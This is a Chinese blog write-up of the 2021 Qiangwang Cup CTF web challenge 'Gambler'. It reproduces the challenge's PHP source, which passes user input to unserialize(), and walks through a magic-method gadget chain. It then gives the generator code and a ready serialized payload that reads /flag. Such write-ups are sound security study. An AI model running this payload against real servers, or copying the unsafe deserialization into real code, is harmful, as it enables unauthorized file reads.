2021强网杯-强网先锋-赌徒-WP

最新推荐文章于 2022-07-13 22:09:38 发布
最新推荐文章于 2022-07-13 22:09:38 发布
阅读量596 收藏
点赞数 1
分类专栏: CTF WEB 文章标签: unctf 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44499757/article/details/117920394
版权
CTF 同时被 2 个专栏收录
3 篇文章 0 订阅
订阅专栏
WEB
1 篇文章 0 订阅
订阅专栏

在这里插入图片描述

1、打开网页显示如下:

在这里插入图片描述

2、进行目录扫描,发现www.zip文件。

在这里插入图片描述

3、进行源代码审计

<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);


class Start
{
    public $name='guest';
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';
	
    public function __construct(){
        echo "I think you need /etc/hint . Before this you need to see the source code";
    }

    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }

    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}

class Info
{
    private $phonenumber=123123;
    public $promise='I do';
	
    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }

    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}

class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';
	
    public function __get($name){
        $function = $this->a;
        return $function();
    }
	
    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }

    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}

if(isset($_GET['hello'])){
    unserialize($_GET['hello']);
}else{
    $hi = new  Start();
}
?>

4、根据源代码发现应该是反序列化,构造代码生成序列化字符串

$st = new Start();
$ro = new Room();
$ro->a = $ro;
$in = new Info();
$in->file['filename'] = $ro; // 将该变量指示Room对象后,
// return $this->file['filename']->ffiillee['ffiilleennaammee'];
// 以上语句变为 return $ro->ffiillee['ffiilleennaammee']
// $ro->ffiillee['ffiilleennaammee'] 语句在执行时,触发Room的__get()方法(私有变量或不存在的变量均会触发__get()方法)
// $ro-a->$ro; 指向了Room对象自己。在__get()方法执行时,对象执行函数调用触发__invoke()后,获取flag文件的Base64编码
$st->name = $in;
echo serialize($st);

生成的序列化Payload如下:

O:5:"Start":2:{s:4:"name";O:4:"Info":3:{s:17:"%00Info%00phonenumber";i:123123;s:7:"promise";s:15:"I will not !!!!";s:4:"file";a:1:{s:8:"filename";O:4:"Room":3:{s:8:"filename";s:5:"/flag";s:10:"sth_to_set";N;s:1:"a";r:6;}}}s:4:"flag";s:33:"syst3m("cat 127.0.0.1/etc/hint");";}

5、网页get方法,hello参数设为payload后,获取flag的base64,(需要注意前两个字符“hi“不是flag文件内容)Base64解码后得到flag。
在这里插入图片描述

在这里插入图片描述

天若有情(爱笑妍)
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
强网杯2021 [强网先锋]赌徒
weixin_45805993的博客
09-14 397
0x00 前言 当时打比赛的时候因为队里的web师傅tql(r2 yyds),就一直在做misc,web就做了一道强网先锋,现在回来复现一下,不过buu的上的题不全,也没得办法 0x01 [强网先锋]赌徒 正好还留着有源码,先贴一波 <meta charset="utf-8"> <?php //hint is in hint.php error_reporting(1); class Start { public $name='guest'; public $flag='sy
强网杯2021——wp
m0_46296905的博客
11-30 4005
文章目录一、MISC(一)ISO1995(二)BlueTeaming(三)EzTime(四)Cipherman(五)threebody 一、MISC (一)ISO1995 题目描述:We follow ISO1995. ISO1995 has many problems though. One known problem is a time. 压缩包解压密码:fantasicqwb2021 光看文件头辨别不出什么文件,file命令看一下发现是Linux Debian的磁盘文件 binwalk提取出一个I
[复现]-2021强网杯 [强网先锋]赌徒
zji
06-27 502
[复现]-2021强网杯 [强网先锋]赌徒 主要过程 首先我是centos7 php 。然后vim /flag根目录创建flag flag{35-44c7-850e-131e10c9a6ud} 我省略了zip.www扫描源码。 1、 在根目录下建立flag文件(这个文件在正式做题中我们是见不到的,实际上是需要我们通过解题找到这个文件的) vim /flag输入flag: flag{70702196032-ec35-44c7-850e-131e10c9a6ud} 保存退出 2、 在网站目录建立test
强网杯2021 ctf线上赛ezmath wp(#超详细,带逆向新手走过一个又一个小坑)
漫小牛的博客
06-21 3412
文章目录引言第一步、分析文件类型1.可执行文件判断 引言 这是强网杯2021中的一道Reverse题,将附件进行下载,名称为ezmath,名称为chall,说明这道题跟数学有关,都说ctf比赛三大谎言:ez、eazy和baby,名称简单,实则并不简单。做出这道题,需要的数学知识远远大于逆向知识。 题目附件: 链接:https://pan.baidu.com/s/13TheaHB7XcbGnBp-M1N5Rg 提取码:k4pm 第一步、分析文件类型 1.可执行文件判断 使用Exeinfo PE查看文件的类型,
强网杯-upload1
08-08
强网杯强网先锋upload题,题目附件是data.pcapng文件直接打开(如果有wireshark软件)通过观察,发现有两个有用的数据包第一个是No. 2打开
2018强网杯CTF-题目整理.zip
12-17
2018强网杯CTF___题目整理
强网杯 WriteUp By Nu1L
08-02
2022年第六届“强网杯”全国网络安全挑战赛
2018强网杯CTF-题目整理-校本图片Readme.zip
最新发布
12-18
强网杯 2018强网杯CTF___题目整理 │ ├── 01Misc-4题 │ ├── 题目名称:ai-nimals │ │ └── 题目名称:ai-nimals.mhtml │ ├── 题目名称:welcome │ │ └── 题目名称:welcome.mhtml │ ├── ...
2021-07-22ctf2021强网杯wp赌徒反序列化
qq_45290991的博客
07-22 629
文章目录 源代码:分析__invoke__get_tostring EXP调用流程:总结 源代码: <meta charset="utf-8"> <?php //hint is in hint.php error_repo...
2021强网杯 Web赌徒 WP
E1even的博客
06-15 361
文章目录源代码:分析__invoke__get_tostringEXP调用流程:总结 源代码: <meta charset="utf-8"> <?php //hint is in hint.php error_reporting(1); class Start { public $name='guest'; public $flag='syst3m("cat 127.0.0.1/etc/hint");'; public function __construc
2021强网杯 Web寻宝 WP
热门推荐
weixin_46245411的博客
06-14 1万+
前言:大佬们太强了、队友太强了,我只能写写被大佬们打爆的题来摸鱼 文章目录寻宝一、KEY1获取方式bypass二、KEY2获取总结 寻宝 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、KEY1获取方式bypass 具体步骤: 第一层:要求非纯数字,利用PHP的格式转换(字符串比较读取)$num1=1025a即可 第二层:绕过intv
强网杯2021 qwb misc WP 5题
mumuzi的博客
06-16 2625
BlueTeaming、ISO1995、CipherMan、ExtremelySlow、EzTime 本来是说昨天发的,忘了…… 然后取证题,比较偏向爆破出的flag;如果是想知道原理等可以去看看空白师傅的WP:https://mp.weixin.qq.com/s/ItaIgLxcXCjvAhyyP3On9Q BlueTeaming 下载解压,得到一个无后缀,winhex查看是7z文件头,添加.7z,解压 得到一个5个G的memory.dmp文件 是一个内存镜像,常见的内存镜像文件有raw、vmem、dmp
2021强网拟态misc部分wp
hezhing
11-02 306
2021强网拟态misc部分wp Bar 打开是一个gif,看着有点像莫斯,先用gif分离工具分离一下,得到334张图片 发现有三种颜色,黑白灰。猜测黑为"-",白为".",灰色为空格,生成莫斯密码: from PIL import Image import os for i in os.listdir(): if(i.split(".")[1] == "png"): p = Image.open(
2021强网杯 逆向部分WP
VRMEI的博客
06-20 791
今年的逆向很???? ezmath 一道数学题,关键在于函数式的缩放化简。 第15行的公式是整个程序的关键 f(n) = e - nf(n) 是一个调和级数的缩放题目 最后当n较大时易知:n = e / f(n) 脚本: #include<stdio.h> #include<math.h> doubledbl_4020[19] = { 0.00009794904266317233, 0.00010270456917442, 0.0...
2021第五届强网杯部分writewp
zji
06-14 879
第五届强网杯部分题解 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录第五届强网杯部分题解前言一、Web1.1Web1 [强网先锋]寻宝操作过程二、MISC2.读入数据三、PWN 前言 提示:这里不是我一个人打出来的,一个团队,然后可能有些写得不是很清楚,望见谅。 提示:以下是本篇文章正文内容,下面案例可供参考 一、Web 1.1Web1 [强网
强网拟态线上赛-部分WP
qq_53460654的博客
12-15 1240
web zerocalc 计算器页面 试试直接读flag,直接非预期 new_hospital 进入网站 抓包 发现cookie值有点东西 是base64加密的.js,先修改成1.js的base64加密,看看有啥反应 然后扫描目录得到一个老网站 访问一下,在/old/feature.php,发现报错 在这里可以任意文件读取,然后读取…/flag.php的base64加密 misc WeirdPhoto 进行长宽爆破 import zlib import struct
2021 强网杯 [强网先锋]orw
z1r0的博客
07-13 490
开了沙盒,利用orw来读flag 没有对index做出限制,可以进行oob。并且当size为0时,可以无限溢出 往heap_ptr的上面找一下,看一下哪个got表可以被轻松利用。 发现了三个常用的got表,因为提供了free功能,所以就直接oob到free的got表,改free为orw即可。 (2020E0 - 0x202018)/ 8 = 25 exp如下...
广东省第四届“强网杯”网络安全大赛(“泄露的秘密WP”)
weixin_46245411的博客
10-14 5139
感觉应该就算交了WP也进不了决赛~~ 我直接把WP放这里 “泄露的秘密”: 发现存在大量“HTTP”包。 下一步跟踪HTTP流后, 发现存在SQL注入攻击。 使用python脚本获取传递的参数信息:(附上脚本) import pyshark import urllib import re file=pyshark.FileCapture('log.pcapng',display_filter="http") ...
强网杯-2022 yakagame
11-22
强网杯-2022 yakagame是一个国际性的网络安全竞赛,旨在提高参赛者在网络安全领域的技术能力和解决问题的能力。比赛的目标是通过攻防对抗的方式,测试参赛者在网络攻防、逆向工程、密码学等方面的知识与技能。 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

天若有情(爱笑妍)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值